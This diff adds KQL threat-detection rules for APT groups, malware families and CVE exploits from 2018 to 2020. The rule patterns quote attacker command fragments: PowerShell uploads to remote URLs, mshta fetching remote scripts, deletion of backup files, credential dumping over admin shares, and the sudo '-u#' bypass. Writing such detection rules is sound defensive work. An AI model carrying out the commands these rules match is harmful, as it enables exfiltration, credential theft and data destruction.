@@ -0,0 +1,12 @@ +// Title: OilRig APT Registry Persistence +// Author: Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community +// Date: 2018-03-23 +// Level: critical +// Description: Detects OilRig registry persistence as reported by Nyotron in their March 2018 report +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.execution, attack.persistence, attack.g0049, attack.t1053.005, attack.s0111, attack.t1543.003, attack.defense-evasion, attack.t1112, attack.command-and-control, attack.t1071.004, detection.emerging-threats +// False Positives: +// - Unlikely + +DeviceRegistryEvents +| where RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\UMe" or RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\UT" \ No newline at end of file diff --git a/KQL/rules-emerging-threats/2018/TA/Slingshot/defrag_deactivation.kql b/KQL/rules-emerging-threats/2018/TA/Slingshot/defrag_deactivation.kql new file mode 100644 index 00000000..3f2876f4 --- /dev/null +++ b/KQL/rules-emerging-threats/2018/TA/Slingshot/defrag_deactivation.kql @@ -0,0 +1,10 @@ +// Title: Defrag Deactivation +// Author: Florian Roth (Nextron Systems), Bartlomiej Czyz (@bczyz1) +// Date: 2019-03-04 +// Level: medium +// Description: Detects the deactivation and disabling of the Scheduled defragmentation task as seen by Slingshot APT group +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.execution, attack.persistence, attack.t1053.005, attack.s0111, detection.emerging-threats + +DeviceProcessEvents +| where (ProcessCommandLine contains "/delete" or ProcessCommandLine contains "/change") and (ProcessCommandLine contains "/TN" and ProcessCommandLine contains "\\Microsoft\\Windows\\Defrag\\ScheduledDefrag") and FolderPath endswith "\\schtasks.exe" \ No newline at end of file 
diff --git a/KQL/rules-emerging-threats/2018/TA/TropicTrooper/tropictrooper_campaign_november_2018.kql b/KQL/rules-emerging-threats/2018/TA/TropicTrooper/tropictrooper_campaign_november_2018.kql new file mode 100644 index 00000000..a2602890 --- /dev/null +++ b/KQL/rules-emerging-threats/2018/TA/TropicTrooper/tropictrooper_campaign_november_2018.kql @@ -0,0 +1,10 @@ +// Title: TropicTrooper Campaign November 2018 +// Author: @41thexplorer, Microsoft Defender ATP +// Date: 2019-11-12 +// Level: high +// Description: Detects TropicTrooper activity, an actor who targeted high-profile organizations in the energy and food and beverage sectors in Asia +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059.001, detection.emerging-threats + +DeviceProcessEvents +| where ProcessCommandLine contains "abCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCc" \ No newline at end of file diff --git a/KQL/rules-emerging-threats/2019/Exploits/BearLPE-Exploit/potential_bearlpe_exploitation.kql b/KQL/rules-emerging-threats/2019/Exploits/BearLPE-Exploit/potential_bearlpe_exploitation.kql new file mode 100644 index 00000000..3f5da515 --- /dev/null +++ b/KQL/rules-emerging-threats/2019/Exploits/BearLPE-Exploit/potential_bearlpe_exploitation.kql @@ -0,0 +1,10 @@ +// Title: Potential BearLPE Exploitation +// Author: Olaf Hartong +// Date: 2019-05-22 +// Level: high +// Description: Detects potential exploitation of the BearLPE exploit using Task Scheduler ".job" import arbitrary DACL write\par +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.execution, attack.privilege-escalation, attack.t1053.005, car.2013-08-001, detection.emerging-threats + +DeviceProcessEvents +| where (ProcessCommandLine contains "/change" and ProcessCommandLine contains "/TN" and ProcessCommandLine contains "/RU" and ProcessCommandLine contains "/RP") and (FolderPath endswith "\\schtasks.exe" or ProcessVersionInfoOriginalFileName =~ "schtasks.exe") \ No newline at end of file 
diff --git a/KQL/rules-emerging-threats/2019/Exploits/CVE-2019-1378/exploiting_setupcomplete_cmd_cve_2019_1378.kql b/KQL/rules-emerging-threats/2019/Exploits/CVE-2019-1378/exploiting_setupcomplete_cmd_cve_2019_1378.kql new file mode 100644 index 00000000..ea8f29ac --- /dev/null +++ b/KQL/rules-emerging-threats/2019/Exploits/CVE-2019-1378/exploiting_setupcomplete_cmd_cve_2019_1378.kql @@ -0,0 +1,10 @@ +// Title: Exploiting SetupComplete.cmd CVE-2019-1378 +// Author: Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro +// Date: 2019-11-15 +// Level: high +// Description: Detects exploitation attempt of privilege escalation vulnerability via SetupComplete.cmd and PartnerSetupComplete.cmd described in CVE-2019-1378 +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.defense-evasion, attack.privilege-escalation, attack.t1068, attack.execution, attack.t1059.003, attack.t1574, cve.2019-1378, detection.emerging-threats + +DeviceProcessEvents +| where ((InitiatingProcessCommandLine contains "\\cmd.exe" and InitiatingProcessCommandLine contains "/c" and InitiatingProcessCommandLine contains "C:\\Windows\\Setup\\Scripts\\") and (InitiatingProcessCommandLine endswith "SetupComplete.cmd" or InitiatingProcessCommandLine endswith "PartnerSetupComplete.cmd")) and (not((FolderPath startswith "C:\\Windows\\System32\\" or FolderPath startswith "C:\\Windows\\SysWOW64\\" or FolderPath startswith "C:\\Windows\\WinSxS\\" or FolderPath startswith "C:\\Windows\\Setup\\"))) \ No newline at end of file diff --git a/KQL/rules-emerging-threats/2019/Exploits/CVE-2019-1388/exploiting_cve_2019_1388.kql b/KQL/rules-emerging-threats/2019/Exploits/CVE-2019-1388/exploiting_cve_2019_1388.kql new file mode 100644 index 00000000..58f0233d --- /dev/null +++ b/KQL/rules-emerging-threats/2019/Exploits/CVE-2019-1388/exploiting_cve_2019_1388.kql 
@@ -0,0 +1,10 @@ +// Title: Exploiting CVE-2019-1388 +// Author: Florian Roth (Nextron Systems) +// Date: 2019-11-20 +// Level: critical +// Description: Detects an exploitation attempt in which the UAC consent dialogue is used to invoke an Internet Explorer process running as LOCAL_SYSTEM +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.t1068, cve.2019-1388, detection.emerging-threats + +DeviceProcessEvents +| where (ProcessCommandLine contains " http" and FolderPath endswith "\\iexplore.exe" and InitiatingProcessFolderPath endswith "\\consent.exe") and ((ProcessIntegrityLevel in~ ("System", "S-1-16-16384")) or (AccountName contains "AUTHORI" or AccountName contains "AUTORI")) \ No newline at end of file diff --git a/KQL/rules-emerging-threats/2019/Exploits/CVE-2019-14287/sudo_privilege_escalation_cve_2019_14287.kql b/KQL/rules-emerging-threats/2019/Exploits/CVE-2019-14287/sudo_privilege_escalation_cve_2019_14287.kql new file mode 100644 index 00000000..3d48787e --- /dev/null +++ b/KQL/rules-emerging-threats/2019/Exploits/CVE-2019-14287/sudo_privilege_escalation_cve_2019_14287.kql @@ -0,0 +1,12 @@ +// Title: Sudo Privilege Escalation CVE-2019-14287 +// Author: Florian Roth (Nextron Systems) +// Date: 2019-10-15 +// Level: high +// Description: Detects users trying to exploit sudo vulnerability reported in CVE-2019-14287 +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1068, attack.t1548.003, cve.2019-14287, detection.emerging-threats +// False Positives: +// - Unlikely + +DeviceProcessEvents +| where ProcessCommandLine contains " -u#" \ No newline at end of file diff --git a/KQL/rules-emerging-threats/2019/Malware/BabyShark/potential_baby_shark_malware_activity.kql b/KQL/rules-emerging-threats/2019/Malware/BabyShark/potential_baby_shark_malware_activity.kql new file mode 100644 index 00000000..9b01ee53 --- /dev/null 
+++ b/KQL/rules-emerging-threats/2019/Malware/BabyShark/potential_baby_shark_malware_activity.kql @@ -0,0 +1,10 @@ +// Title: Potential Baby Shark Malware Activity +// Author: Florian Roth (Nextron Systems) +// Date: 2019-02-24 +// Level: high +// Description: Detects activity that could be related to Baby Shark malware +// MITRE Tactic: Execution +// Tags: attack.execution, attack.defense-evasion, attack.discovery, attack.t1012, attack.t1059.003, attack.t1059.001, attack.t1218.005, detection.emerging-threats + +DeviceProcessEvents +| where (ProcessCommandLine contains "powershell.exe mshta.exe http" and ProcessCommandLine contains ".hta") or (ProcessCommandLine contains "reg query \"HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Default\"" or ProcessCommandLine contains "cmd.exe /c taskkill /im cmd.exe" or ProcessCommandLine contains "(New-Object System.Net.WebClient).UploadFile('http") \ No newline at end of file diff --git a/KQL/rules-emerging-threats/2019/Malware/Dridex/potential_dridex_activity.kql b/KQL/rules-emerging-threats/2019/Malware/Dridex/potential_dridex_activity.kql new file mode 100644 index 00000000..58010ff5 --- /dev/null +++ b/KQL/rules-emerging-threats/2019/Malware/Dridex/potential_dridex_activity.kql 
@@ -0,0 +1,12 @@ +// Title: Potential Dridex Activity +// Author: Florian Roth (Nextron Systems), oscd.community, Nasreddine Bencherchali (Nextron Systems) +// Date: 2019-01-10 +// Level: critical +// Description: Detects potential Dridex acitvity via specific process patterns +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1055, attack.discovery, attack.t1135, attack.t1033, detection.emerging-threats +// False Positives: +// - Unlikely + +DeviceProcessEvents +| where (((ProcessCommandLine contains "C:\\Users\\" and ProcessCommandLine contains "\\Desktop\\") and FolderPath endswith "\\svchost.exe") and (not(InitiatingProcessFolderPath startswith "C:\\Windows\\System32\\"))) or (((ProcessCommandLine contains " -s " or ProcessCommandLine contains "\\AppData\\Local\\Temp\\") and FolderPath endswith "\\regsvr32.exe" and InitiatingProcessFolderPath endswith "\\excel.exe") and (not(ProcessCommandLine contains ".dll"))) or (InitiatingProcessFolderPath endswith "\\svchost.exe" and ((ProcessCommandLine contains " /all" and FolderPath endswith "\\whoami.exe") or (ProcessCommandLine contains " view" and (FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe")))) \ No newline at end of file diff --git a/KQL/rules-emerging-threats/2019/Malware/Dtrack-RAT/potential_dtrack_rat_activity.kql b/KQL/rules-emerging-threats/2019/Malware/Dtrack-RAT/potential_dtrack_rat_activity.kql new file mode 100644 index 00000000..525b7597 --- /dev/null +++ b/KQL/rules-emerging-threats/2019/Malware/Dtrack-RAT/potential_dtrack_rat_activity.kql 
@@ -0,0 +1,12 @@ +// Title: Potential Dtrack RAT Activity +// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) +// Date: 2019-10-30 +// Level: critical +// Description: Detects potential Dtrack RAT activity via specific process patterns +// MITRE Tactic: Impact +// Tags: attack.impact, attack.t1490, detection.emerging-threats +// False Positives: +// - Unlikely + +DeviceProcessEvents +| where (ProcessCommandLine contains "\\temp\\res.ip" and ProcessCommandLine matches regex "ipconfig\\s+/all") or (ProcessCommandLine contains "interface ip show config" and ProcessCommandLine contains "\\temp\\netsh.res") or ProcessCommandLine matches regex "ping\\s+-n.{6,64}echo EEEE\\s?>\\s?" \ No newline at end of file diff --git a/KQL/rules-emerging-threats/2019/Malware/Emotet/potential_emotet_activity.kql b/KQL/rules-emerging-threats/2019/Malware/Emotet/potential_emotet_activity.kql new file mode 100644 index 00000000..b23c06eb --- /dev/null +++ b/KQL/rules-emerging-threats/2019/Malware/Emotet/potential_emotet_activity.kql 
@@ -0,0 +1,12 @@ +// Title: Potential Emotet Activity +// Author: Florian Roth (Nextron Systems) +// Date: 2019-09-30 +// Level: high +// Description: Detects all Emotet like process executions that are not covered by the more generic rules +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059.001, attack.defense-evasion, attack.t1027, detection.emerging-threats +// False Positives: +// - Unlikely + +DeviceProcessEvents +| where ((ProcessCommandLine contains " -e" and ProcessCommandLine contains " PAA") or ProcessCommandLine contains "JABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQ" or ProcessCommandLine contains "QAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUA" or ProcessCommandLine contains "kAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlA" or ProcessCommandLine contains "IgAoACcAKgAnACkAOwAkA" or ProcessCommandLine contains "IAKAAnACoAJwApADsAJA" or ProcessCommandLine contains "iACgAJwAqACcAKQA7ACQA" or ProcessCommandLine contains "JABGAGwAeAByAGgAYwBmAGQ" or ProcessCommandLine contains "PQAkAGUAbgB2ADoAdABlAG0AcAArACgA" or ProcessCommandLine contains "0AJABlAG4AdgA6AHQAZQBtAHAAKwAoA" or ProcessCommandLine contains "9ACQAZQBuAHYAOgB0AGUAbQBwACsAKA") and (not((ProcessCommandLine contains "fAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgAgAC0ARQByAHIAbwByAEEAYwB0AGkAbwBuACAAUwBpAGwAZQBuAHQAbAB5AEMAbwBuAHQAaQBuAHUAZQ" or ProcessCommandLine contains "wAIABDAG8AbgB2AGUAcgB0AFQAbwAtAEoAcwBvAG4AIAAtAEUAcgByAG8AcgBBAGMAdABpAG8AbgAgAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUA" or ProcessCommandLine contains "8ACAAQwBvAG4AdgBlAHIAdABUAG8ALQBKAHMAbwBuACAALQBFAHIAcgBvAHIAQQBjAHQAaQBvAG4AIABTAGkAbABlAG4AdABsAHkAQwBvAG4AdABpAG4AdQBlA"))) \ No newline at end of file diff --git a/KQL/rules-emerging-threats/2019/Malware/Formbook/formbook_process_creation.kql b/KQL/rules-emerging-threats/2019/Malware/Formbook/formbook_process_creation.kql new file mode 100644 index 00000000..cdac7d56 --- /dev/null +++ b/KQL/rules-emerging-threats/2019/Malware/Formbook/formbook_process_creation.kql 
@@ -0,0 +1,10 @@ +// Title: Formbook Process Creation +// Author: Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro +// Date: 2019-09-30 +// Level: high +// Description: Detects Formbook like process executions that inject code into a set of files in the System32 folder, which executes a special command command line to delete the dropper from the AppData Temp folder. We avoid false positives by excluding all parent process with command line parameters. +// MITRE Tactic: Resource Development +// Tags: attack.resource-development, attack.t1587.001, detection.emerging-threats + +DeviceProcessEvents +| where (InitiatingProcessCommandLine endswith ".exe" and (InitiatingProcessCommandLine startswith "C:\\Windows\\System32\\" or InitiatingProcessCommandLine startswith "C:\\Windows\\SysWOW64\\")) and ((ProcessCommandLine contains "/c" and ProcessCommandLine contains "del" and ProcessCommandLine contains "C:\\Users\\" and ProcessCommandLine contains "\\AppData\\Local\\Temp\\") or (ProcessCommandLine contains "/c" and ProcessCommandLine contains "del" and ProcessCommandLine contains "C:\\Users\\" and ProcessCommandLine contains "\\Desktop\\") or (ProcessCommandLine contains "/C" and ProcessCommandLine contains "type nul >" and ProcessCommandLine contains "C:\\Users\\" and ProcessCommandLine contains "\\Desktop\\")) and ProcessCommandLine endswith ".exe" \ No newline at end of file diff --git a/KQL/rules-emerging-threats/2019/Malware/LockerGoga/lockergoga_ransomware_activity.kql b/KQL/rules-emerging-threats/2019/Malware/LockerGoga/lockergoga_ransomware_activity.kql new file mode 100644 index 00000000..d60a2944 --- /dev/null +++ b/KQL/rules-emerging-threats/2019/Malware/LockerGoga/lockergoga_ransomware_activity.kql 
@@ -0,0 +1,12 @@ +// Title: LockerGoga Ransomware Activity +// Author: Vasiliy Burov, oscd.community +// Date: 2020-10-18 +// Level: critical +// Description: Detects LockerGoga ransomware activity via specific command line. +// MITRE Tactic: Impact +// Tags: attack.impact, attack.t1486, detection.emerging-threats +// False Positives: +// - Unlikely + +DeviceProcessEvents +| where ProcessCommandLine contains "-i SM-tgytutrc -s" \ No newline at end of file diff --git a/KQL/rules-emerging-threats/2019/Malware/QBot/potential_qbot_activity.kql b/KQL/rules-emerging-threats/2019/Malware/QBot/potential_qbot_activity.kql new file mode 100644 index 00000000..8a791bae --- /dev/null +++ b/KQL/rules-emerging-threats/2019/Malware/QBot/potential_qbot_activity.kql @@ -0,0 +1,12 @@ +// Title: Potential QBot Activity +// Author: Florian Roth (Nextron Systems) +// Date: 2019-10-01 +// Level: critical +// Description: Detects potential QBot activity by looking for process executions used previously by QBot +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059.005, detection.emerging-threats +// False Positives: +// - Unlikely + +DeviceProcessEvents +| where (FolderPath endswith "\\wscript.exe" and InitiatingProcessFolderPath endswith "\\WinRAR.exe") or ProcessCommandLine contains " /c ping.exe -n 6 127.0.0.1 & type " or (ProcessCommandLine contains "regsvr32.exe" and ProcessCommandLine contains "C:\\ProgramData" and ProcessCommandLine contains ".tmp") \ No newline at end of file diff --git a/KQL/rules-emerging-threats/2019/Malware/Ryuk/potential_ryuk_ransomware_activity.kql b/KQL/rules-emerging-threats/2019/Malware/Ryuk/potential_ryuk_ransomware_activity.kql new file mode 100644 index 00000000..35534de5 --- /dev/null +++ b/KQL/rules-emerging-threats/2019/Malware/Ryuk/potential_ryuk_ransomware_activity.kql 
@@ -0,0 +1,12 @@ +// Title: Potential Ryuk Ransomware Activity +// Author: Florian Roth (Nextron Systems), Vasiliy Burov, Nasreddine Bencherchali (Nextron Systems) +// Date: 2019-12-16 +// Level: high +// Description: Detects Ryuk ransomware activity +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.001, detection.emerging-threats +// False Positives: +// - Unlikely + +DeviceProcessEvents +| where (ProcessCommandLine contains "del /s /f /q c:\\" and ProcessCommandLine contains "*.bac" and ProcessCommandLine contains "*.bak" and ProcessCommandLine contains "*.bkf") or ((ProcessCommandLine contains "samss" or ProcessCommandLine contains "audioendpointbuilder" or ProcessCommandLine contains "unistoresvc_" or ProcessCommandLine contains "AcrSch2Svc") and (ProcessCommandLine contains " stop " and ProcessCommandLine contains " /y") and (FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe")) or (ProcessCommandLine contains "Microsoft\\Windows\\CurrentVersion\\Run" and ProcessCommandLine contains "C:\\users\\Public\\") \ No newline at end of file diff --git a/KQL/rules-emerging-threats/2019/Malware/Snatch/potential_snatch_ransomware_activity.kql b/KQL/rules-emerging-threats/2019/Malware/Snatch/potential_snatch_ransomware_activity.kql new file mode 100644 index 00000000..49bbc955 --- /dev/null +++ b/KQL/rules-emerging-threats/2019/Malware/Snatch/potential_snatch_ransomware_activity.kql 
@@ -0,0 +1,12 @@ +// Title: Potential Snatch Ransomware Activity +// Author: Florian Roth (Nextron Systems) +// Date: 2020-08-26 +// Level: high +// Description: Detects specific process characteristics of Snatch ransomware word document droppers +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1204, detection.emerging-threats +// False Positives: +// - Scripts that shutdown the system immediately and reboot them in safe mode are unlikely + +DeviceProcessEvents +| where ProcessCommandLine matches regex "shutdown\\s+/r /f /t 00" or ProcessCommandLine matches regex "net\\s+stop SuperBackupMan" \ No newline at end of file diff --git a/KQL/rules-emerging-threats/2019/Malware/Ursnif/potential_ursnif_malware_activity_registry.kql b/KQL/rules-emerging-threats/2019/Malware/Ursnif/potential_ursnif_malware_activity_registry.kql new file mode 100644 index 00000000..84dec431 --- /dev/null +++ b/KQL/rules-emerging-threats/2019/Malware/Ursnif/potential_ursnif_malware_activity_registry.kql @@ -0,0 +1,10 @@ +// Title: Potential Ursnif Malware Activity - Registry +// Author: megan201296 +// Date: 2019-02-13 +// Level: high +// Description: Detects registry keys related to Ursnif malware. +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.defense-evasion, attack.execution, attack.t1112, detection.emerging-threats + +DeviceRegistryEvents +| where RegistryKey endswith "\\Software\\AppDataLow\\Software\\Microsoft\\3A861D62-51E0-7C9D-AB0E-15700F2219A4" \ No newline at end of file diff --git a/KQL/rules-emerging-threats/2019/TA/APC-C-12/potential_apt_c_12_bluemushroom_dll_load_activity_via_regsvr32.kql b/KQL/rules-emerging-threats/2019/TA/APC-C-12/potential_apt_c_12_bluemushroom_dll_load_activity_via_regsvr32.kql new file mode 100644 index 00000000..d73050a1 --- /dev/null +++ b/KQL/rules-emerging-threats/2019/TA/APC-C-12/potential_apt_c_12_bluemushroom_dll_load_activity_via_regsvr32.kql 
@@ -0,0 +1,10 @@ +// Title: Potential APT-C-12 BlueMushroom DLL Load Activity Via Regsvr32 +// Author: Florian Roth (Nextron Systems), Tim Shelton, Nasreddine Bencherchali (Nextron Systems) +// Date: 2019-10-02 +// Level: medium +// Description: Detects potential BlueMushroom DLL loading activity via regsvr32 from AppData Local +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218.010, detection.emerging-threats + +DeviceProcessEvents +| where ProcessCommandLine contains "regsvr32" and ProcessCommandLine contains "\\AppData\\Local\\" and ProcessCommandLine contains ".dll" and ProcessCommandLine contains ",DllEntry" \ No newline at end of file diff --git a/KQL/rules-emerging-threats/2019/TA/APT31/apt31_judgement_panda_activity.kql b/KQL/rules-emerging-threats/2019/TA/APT31/apt31_judgement_panda_activity.kql new file mode 100644 index 00000000..58cd05f6 --- /dev/null +++ b/KQL/rules-emerging-threats/2019/TA/APT31/apt31_judgement_panda_activity.kql @@ -0,0 +1,12 @@ +// Title: APT31 Judgement Panda Activity +// Author: Florian Roth (Nextron Systems) +// Date: 2019-02-21 +// Level: critical +// Description: Detects APT31 Judgement Panda activity as described in the Crowdstrike 2019 Global Threat Report +// MITRE Tactic: Collection +// Tags: attack.collection, attack.lateral-movement, attack.credential-access, attack.g0128, attack.t1003.001, attack.t1560.001, detection.emerging-threats +// False Positives: +// - Unlikely + +DeviceProcessEvents +| where ((ProcessCommandLine contains "\\aaaa\\procdump64.exe" or ProcessCommandLine contains "\\aaaa\\netsess.exe" or ProcessCommandLine contains "\\aaaa\\7za.exe" or ProcessCommandLine contains "\\c$\\aaaa\\") and (ProcessCommandLine contains "copy \\\\" and ProcessCommandLine contains "c$")) or (ProcessCommandLine contains "ldifde" and ProcessCommandLine contains "-f -n" and ProcessCommandLine contains "eprod.ldf") \ No newline at end of file 
diff --git a/KQL/rules-emerging-threats/2019/TA/Bear-APT-Activity/potential_russian_apt_credential_theft_activity.kql b/KQL/rules-emerging-threats/2019/TA/Bear-APT-Activity/potential_russian_apt_credential_theft_activity.kql new file mode 100644 index 00000000..047815fc --- /dev/null +++ b/KQL/rules-emerging-threats/2019/TA/Bear-APT-Activity/potential_russian_apt_credential_theft_activity.kql @@ -0,0 +1,12 @@ +// Title: Potential Russian APT Credential Theft Activity +// Author: Florian Roth (Nextron Systems) +// Date: 2019-02-21 +// Level: critical +// Description: Detects Russian group activity as described in Global Threat Report 2019 by Crowdstrike +// MITRE Tactic: Credential Access +// Tags: attack.credential-access, attack.t1552.001, attack.t1003.003, detection.emerging-threats +// False Positives: +// - Unlikely + +DeviceProcessEvents +| where (ProcessCommandLine contains "adexplorer -snapshot \"\" c:\\users\\" and ProcessCommandLine contains "\\downloads\\" and ProcessCommandLine contains ".snp") or (ProcessCommandLine contains "xcopy /S /E /C /Q /H \\\\" and ProcessCommandLine contains "\\sysvol\\") \ No newline at end of file diff --git a/KQL/rules-emerging-threats/2019/TA/EmpireMonkey/potential_empiremonkey_activity.kql b/KQL/rules-emerging-threats/2019/TA/EmpireMonkey/potential_empiremonkey_activity.kql new file mode 100644 index 00000000..b76c6179 --- /dev/null +++ b/KQL/rules-emerging-threats/2019/TA/EmpireMonkey/potential_empiremonkey_activity.kql 
@@ -0,0 +1,12 @@ +// Title: Potential EmpireMonkey Activity +// Author: Markus Neis, Nasreddine Bencherchali (Nextron Systems) +// Date: 2019-04-02 +// Level: high +// Description: Detects potential EmpireMonkey APT activity +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218.010, detection.emerging-threats +// False Positives: +// - Unlikely + +DeviceProcessEvents +| where ProcessCommandLine contains "/e:jscript" and ProcessCommandLine contains "\\Local\\Temp\\Errors.bat" \ No newline at end of file diff --git a/KQL/rules-emerging-threats/2019/TA/EquationGroup/equation_group_dll_u_export_function_load.kql b/KQL/rules-emerging-threats/2019/TA/EquationGroup/equation_group_dll_u_export_function_load.kql new file mode 100644 index 00000000..89bb9933 --- /dev/null +++ b/KQL/rules-emerging-threats/2019/TA/EquationGroup/equation_group_dll_u_export_function_load.kql @@ -0,0 +1,12 @@ +// Title: Equation Group DLL_U Export Function Load +// Author: Florian Roth (Nextron Systems) +// Date: 2019-03-04 +// Level: critical +// Description: Detects a specific export function name used by one of EquationGroup tools +// MITRE Tactic: Defense Evasion +// Tags: attack.g0020, attack.defense-evasion, attack.t1218.011, detection.emerging-threats +// False Positives: +// - Unlikely + +DeviceProcessEvents +| where ProcessCommandLine contains "-export dll_u" or (ProcessCommandLine endswith ",dll_u" or ProcessCommandLine endswith " dll_u") \ No newline at end of file diff --git a/KQL/rules-emerging-threats/2019/TA/MustangPanda/mustang_panda_dropper.kql b/KQL/rules-emerging-threats/2019/TA/MustangPanda/mustang_panda_dropper.kql new file mode 100644 index 00000000..6cb47e3b --- /dev/null +++ b/KQL/rules-emerging-threats/2019/TA/MustangPanda/mustang_panda_dropper.kql 
@@ -0,0 +1,12 @@ +// Title: Mustang Panda Dropper +// Author: Florian Roth (Nextron Systems), oscd.community +// Date: 2019-10-30 +// Level: high +// Description: Detects specific process parameters as used by Mustang Panda droppers +// MITRE Tactic: Resource Development +// Tags: attack.t1587.001, attack.resource-development, detection.emerging-threats +// False Positives: +// - Unlikely + +DeviceProcessEvents +| where ((ProcessCommandLine contains "Temp\\wtask.exe /create" or ProcessCommandLine contains "%windir:~-3,1%%PUBLIC:~-9,1%" or ProcessCommandLine contains "/tn \"Security Script " or ProcessCommandLine contains "%windir:~-1,1%") or (ProcessCommandLine contains "/E:vbscript" and ProcessCommandLine contains "C:\\Users\\" and ProcessCommandLine contains ".txt" and ProcessCommandLine contains "/F")) or FolderPath endswith "Temp\\winwsh.exe" \ No newline at end of file diff --git a/KQL/rules-emerging-threats/2019/TA/Operation-Wocao/operation_wocao_activity.kql b/KQL/rules-emerging-threats/2019/TA/Operation-Wocao/operation_wocao_activity.kql new file mode 100644 index 00000000..f220cfaa --- /dev/null +++ b/KQL/rules-emerging-threats/2019/TA/Operation-Wocao/operation_wocao_activity.kql 
@@ -0,0 +1,12 @@ +// Title: Operation Wocao Activity +// Author: Florian Roth (Nextron Systems), frack113 +// Date: 2019-12-20 +// Level: high +// Description: Detects activity mentioned in Operation Wocao report +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.discovery, attack.t1012, attack.defense-evasion, attack.t1036.004, attack.t1027, attack.execution, attack.t1053.005, attack.t1059.001, detection.emerging-threats +// False Positives: +// - Administrators that use checkadmin.exe tool to enumerate local administrators + +DeviceProcessEvents +| where ProcessCommandLine contains "checkadmin.exe 127.0.0.1 -all" or ProcessCommandLine contains "netsh advfirewall firewall add rule name=powershell dir=in" or ProcessCommandLine contains "cmd /c powershell.exe -ep bypass -file c:\\s.ps1" or ProcessCommandLine contains "/tn win32times /f" or ProcessCommandLine contains "create win32times binPath=" or ProcessCommandLine contains "\\c$\\windows\\system32\\devmgr.dll" or ProcessCommandLine contains " -exec bypass -enc JgAg" or (ProcessCommandLine contains "type " and ProcessCommandLine contains "keepass\\KeePass.config.xml") or ProcessCommandLine contains "iie.exe iie.txt" or (ProcessCommandLine contains "reg query HKEY_CURRENT_USER\\Software\\" and ProcessCommandLine contains "\\PuTTY\\Sessions\\") \ No newline at end of file diff --git a/KQL/rules-emerging-threats/2020/Exploits/CVE-2020-10189/exploited_cve_2020_10189_zoho_manageengine.kql b/KQL/rules-emerging-threats/2020/Exploits/CVE-2020-10189/exploited_cve_2020_10189_zoho_manageengine.kql new file mode 100644 index 00000000..af860080 --- /dev/null +++ b/KQL/rules-emerging-threats/2020/Exploits/CVE-2020-10189/exploited_cve_2020_10189_zoho_manageengine.kql 
@@ -0,0 +1,10 @@ +// Title: Exploited CVE-2020-10189 Zoho ManageEngine +// Author: Florian Roth (Nextron Systems) +// Date: 2020-03-25 +// Level: high +// Description: Detects the exploitation of Zoho ManageEngine Desktop Central Java Deserialization vulnerability reported as CVE-2020-10189 +// MITRE Tactic: Initial Access +// Tags: attack.initial-access, attack.t1190, attack.execution, attack.t1059.001, attack.t1059.003, attack.s0190, cve.2020-10189, detection.emerging-threats + +DeviceProcessEvents +| where (FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\bitsadmin.exe" or FolderPath endswith "\\systeminfo.exe" or FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe" or FolderPath endswith "\\reg.exe" or FolderPath endswith "\\query.exe") and InitiatingProcessFolderPath endswith "DesktopCentral_Server\\jre\\bin\\java.exe" \ No newline at end of file diff --git a/KQL/rules-emerging-threats/2020/Exploits/CVE-2020-1048/cve_2020_1048_exploitation_attempt_suspicious_new_printer_ports_registry.kql b/KQL/rules-emerging-threats/2020/Exploits/CVE-2020-1048/cve_2020_1048_exploitation_attempt_suspicious_new_printer_ports_registry.kql new file mode 100644 index 00000000..24dc5f58 --- /dev/null +++ b/KQL/rules-emerging-threats/2020/Exploits/CVE-2020-1048/cve_2020_1048_exploitation_attempt_suspicious_new_printer_ports_registry.kql 
